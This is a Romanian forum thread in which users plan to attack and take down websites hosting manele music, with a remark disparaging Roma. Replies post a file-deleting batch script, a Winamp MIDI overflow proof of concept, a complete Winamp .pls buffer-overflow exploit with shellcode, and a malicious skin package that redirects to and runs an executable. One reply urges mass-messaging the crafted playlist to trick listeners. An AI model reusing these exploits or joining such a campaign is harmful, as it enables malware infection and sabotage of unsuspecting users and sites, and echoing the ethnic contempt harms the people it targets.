Jump to content
scara

...::: trebuie sa facem ceva !!! :::..

Recommended Posts

Am tot stat si am analizat situatia si am ajuns la parerea ca nu se mai poate!!

Va intrebati despre ce e vorba?

E vorba despre virusul asta care n-ea invaluit creierii si buna dispozitie : MANEAUA.Da,in autobuz dimineata cand mergi la servici-manele,cant te intorci dupa 8 ore de lucru-manele-cu branza,cu telemea,cu bani aruncati ,cu lei grei,etc,etc.

Am postat acest subiect aici pentru ca ar trebui sa incercam sa sa ne unim fortele si sa incerca sa "starpim" toate siturile care pune la indemana acest virus insuportabil.Probabil multora le place acest gen de "zgomot",da sa nu uitam ca e muzica lautareasca,mai precis tiganeasca-si in loc sa le dam exemplu tiganilor ne dam dupa ei.Obiectivul meu de acum incolo va fii distrugerea siteurilor care au acest gen de muzica (stiam ceva de genu www.comymanele.tk)

 se alatura cineva?

Link to comment
Share on other sites

intr-o saptamana maxim (adik dupa ce dau ultimu examen) ma apuc de rescris virusu manelelor. Numai ca il fac virus adevarat, nu ca ala care umbla acum pe net. Ala e mai mult troian decat virus. O sa am nevoie de putin ajutor. Daca aveti careva exploitu pt remote execution la winamp (pana in ver 5.0.13) postati aici. Vreau sa fac o tb serioasa.

Link to comment
Share on other sites

Dap..probabil ca daca veti face un antimanele....desi nu ma prea pricep, as fi tentat sa platesc ceva bani(cu inca cativa prieteni cred ca am avea o suma prin care am scoate un virusoi) pt a crea ceva asemanator la rockul hard.....Oricum io zic ca atata timp cat le veti ignnora, nu vor mai fi puse peste tot.Maneaua are succes din cauza unora ca voi.Pt ca din moemnt ce voi nu le suportati si incercatis a faceti ceva ca sa le opriti de aceea unii se ambitioneaza si dau mai tare si pun manele peste tot.Tot voi sunteti vinovatii.Pt ca toata lumea e antimanelista, a inceput sa se auda si de guta si de adrian si vijelie si de altii.Pt ca voi vreti asta.Credeti-ma cand va spun ca ei cantau de mult si erau cunoscuti de cei ce asculatu genu asta de muzica, nu sunt lansati de curand cum credeti voi....numa pt ca voii ati inceput sa fifi antimaneleisti, de aceea li s-a facut mai multa publicitate.Stiti f bine cati bani sunt in joc si nu veti putea opri niciodata cu astfel de tertipuri....mai rau le veti face publicitate..la fel cum a fost cu virusache antimanele...Sper ca ati inteles in mare parte ce am vrut sa zic...si nu vreaus a incep o polemica cu voi pe aceasta tema.Bafta!

Link to comment
Share on other sites

AntiManele.BAT

:main

if exist C:muzica goto cmanele

if exist D:muzica goto dmanele

if exist E:muzica goto emanele



:cmanele

C:

cd muzica

del *guta*.*

del *adi*.*

del *vijelie*.*

del *minune*.*

goto main



:dmanele

D:

cd muzica

del *guta*.*

del *adi*.*

del *vijelie*.*

del *minune*.*

goto main





:emanele

e:

cd muzica

del *guta*.*

del *adi*.*

del *vijelie*.*

del *minune*.*

goto main

testat de mine sterge manelele din c: (d sau e) Muzica

Link to comment
Share on other sites

/*



* ********************************************** *

* Winamp 5.21 - Midi Buffer Overflow in_midi.dll *

* ********************************************** *

* PoC coded by: BassReFLeX                       *

* Date: 19 Jun 2006                              *

* ********************************************** *



*/



#include <stdio.h>

#include <stdlib.h>

#include <string.h>



void usage(char* file);



char header[] = "x4Dx54x68x64x00x00"

               "x00x06x00x00x00x01"

               "x00x60x4Dx54x72x6B"

               "x00x00";



char badc0de[] = "xFFxFFxFFxFFxFFxFF"

  "xFFxFFxFFxFFxFFxFF";

   

   

   

int main(int argc,char* argv[])

{

   system("cls");

   printf("n* ********************************************** *");

   printf("n* Winamp 5.21 - Midi Buffer Overflow in_midi.dll *");

   printf("n* ********************************************** *");

   printf("n* PoC coded by: BassReFLeX                       *");

   printf("n* Date: 19 Jun 2006                              *");

   printf("n* ********************************************** *");

   

   if ( argc!=2 )

   {

       usage(argv[0]);

   }

   

   FILE *f;

   f = fopen(argv[1],"w");

   if ( !f )

   {

       printf("nFile couldn't open!");

       exit(1);

   }

   

                       

   printf("nnWriting crafted .mid file...");

   fwrite(header,1,sizeof(header),f);

   fwrite(badc0de,1,sizeof(badc0de),f);

   printf("nFile created successfully!");

   printf("nFile: %s",argv[1]);

   return 0;

}        



void usage(char* file)

{

   printf("nn");

   printf("n%s <Filename>",file);

   printf("nnFilename = .mid crafted file. Example: winsploit.exe craftedsh1t.mid");

   exit(1);

}    

astai unu

al doilea faci un pls si dai mass cu mesaju "cel mai tare post de manele online" sa vezi cum vin fraieriii



/*

*

* Winamp 5.12 Remote Buffer Overflow Universal Exploit (Zero-Day)

* Bug discovered & exploit coded by ATmaCA

* Web: [url]http://www.spyinstructors.com[/url]  && [url]http://www.atmacasoft.com[/url]

* E-Mail: [email]atmaca@icqmail.com[/email]

* Credit to Kozan

*

*/



/*

*

* Tested with :

* Winamp 5.12 on Win XP Pro Sp2

*

*/



/*

* Usage:

*

* Execute exploit, it will create "crafted.pls" in current directory.

* Duble click the file, or single click right and then select "open".

* And Winamp will launch a Calculator (calc.exe)

*

*/



/*

*

* For to use it remotly,

* make a html page containing an iframe linking to the .pls file.

*

* [url]http://www.spyinstructors.com/atmaca/research/winamp_ie_poc.htm[/url]

*

*/



#include <windows.h>

#include <stdio.h>



#define BUF_LEN         0x045D

#define PLAYLIST_FILE   "crafted.pls"



char szPlayListHeader1[] = "[playlist]rnFile1=";

char szPlayListHeader2[] = "rnTitle1=~BOF~rnLength1=FFFrnNumberOfEntries=1rnVersion=2rn";



// Jump to shellcode

char jumpcode[] = "x61xD9x02x02x83xECx34x83xECx70xFFxE4";



// Harmless Calc.exe

char shellcode[] =

       "x54x50x53x50x29xc9x83xe9xdexe8xffxffxffxffxc0x5ex81x76x0ex02"

       "xddx0ex4dx83xeexfcxe2xf4xfex35x4ax4dx02xddx85x08x3ex56x72x48"

"x7axdcxe1xc6x4dxc5x85x12x22xdcxe5x04x89xe9x85x4cxecxecxcexd4"

"xaex59xcex39x05x1cxc4x40x03x1fxe5xb9x39x89x2ax49x77x38x85x12"

"x26xdcxe5x2bx89xd1x45xc6x5dxc1x0fxa6x89xc1x85x4cxe9x54x52x69"

       "x06x1ex3fx8dx66x56x4ex7dx87x1dx76x41x89x9dx02xc6x72xc1xa3xc6"

"x6axd5xe5x44x89x5dxbex4dx02xddx85x25x3ex82x3fxbbx62x8bx87xb5"

"x81x1dx75x1dx6axa3xd6xafx71xb5x96xb3x88xd3x59xb2xe5xbex6fx21"

"x61xddx0ex4d";





int main(int argc,char *argv[])

{

       printf("nWinamp 5.12 Remote Buffer Overflow Universal Exploit");

       printf("nBug discovered & exploit coded by ATmaCA");

       printf("nWeb: [url]http://www.spyinstructors.com[/url]  && http://www.atmacasoft.com");

       printf("nE-Mail: [email]atmaca@icqmail.com[/email]");

       printf("nCredit to Kozan");



       FILE *File;

       char *pszBuffer;



       if ( (File = fopen(PLAYLIST_FILE,"w+b")) == NULL ) {

               printf("n [Err:] fopen()");

               exit(1);

       }



       pszBuffer = (char*)malloc(BUF_LEN);

       memset(pszBuffer,0x90,BUF_LEN);

       memcpy(pszBuffer,szPlayListHeader1,sizeof(szPlayListHeader1)-1);

       memcpy(pszBuffer+0x036C,shellcode,sizeof(shellcode)-1);

       memcpy(pszBuffer+0x0412,jumpcode,sizeof(jumpcode)-1);

       memcpy(pszBuffer+0x0422,szPlayListHeader2,sizeof(szPlayListHeader2)-1);



       fwrite(pszBuffer, BUF_LEN, 1,File);

       fclose(File);



       printf("nn"  PLAYLIST_FILE  " has been created in the current directory.n");

       return 1;

}

all treilea e pt skinuri :D



This 0day exploit is known to be circulating in the wild



There is no patch for this vulnerability -> Do not use Winamp !



[url]http://www.milw0rm.com/sploits/skinhead.rar[/url] (171 Ko)





index.html

-----------

<html>

<head>

</head>

<frameset rows="*,1" framespacing="0" border="0" frameborder="NO">

<frame src="load.php" name="frame_content" scrolling="auto" noresize>

</frameset>

<noframes>

<body>

</body>

</noframes>

</html>





Load.php

---------

<?php

$httpref = $HTTP_REFERER;

header("Location: http://URL/foo.wsz");

?>





foo.wsz (foo.zip)

-----------------

/frame/

/maki/

/shade/

/html/

/html/file.exe (malicious file to execute)

/html/test.htm (html to load the .exe)

/player/

/player/Thumbs.db

/xml/

/xml/includes.xml

/xml/player-normal.xml

/xml/player.xml

/skin.xml





/html/test.htm

----------------

<html>

<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111123' CODEBASE='file.exe'>

</html>





/xml/includes.xml

-------------------

<include file="player.xml"/>





/xml/player-normal.xml

-------------------------

<layout>

<browser id="browser" x="0" y="0" w="0" h="0" relatw="1" relath="1" url="file:///@SKINPATH@html/test.htm" />

</layout>





/xml/player.xml

-----------------

<container id="main" name="main">

<include file="player-normal.xml"/>

</container>





/skin.xml

---------

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>



<WinampAbstractionLayer version="1.1">

<skininfo>

<version>1.0</version>

<name>Batman</name>

<comment></comment>

<author>Petrol Designs</author>

<email>info@petroldesigns.com</email>

<homepage>http://www.petroldesigns.com</homepage>

</skininfo>



<include file="xml/includes.xml"/>

<!--

-->

</WinampAbstractionLayer>

ENJOY

Link to comment
Share on other sites

Ms mult mult pt exploituri,dar ideea e sa "doboram" cat mai multe situri cu manele,nu sa creem virusi,pt oricum sunt convins ca nu o sa putem oprii raspandirea lor,de ascultat tot o sa se asculte,de aceea am pus topikul asta aici,sa vedem cat mai multe siteuri,forumuri de manelisti...down!

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.




×
×
  • Create New...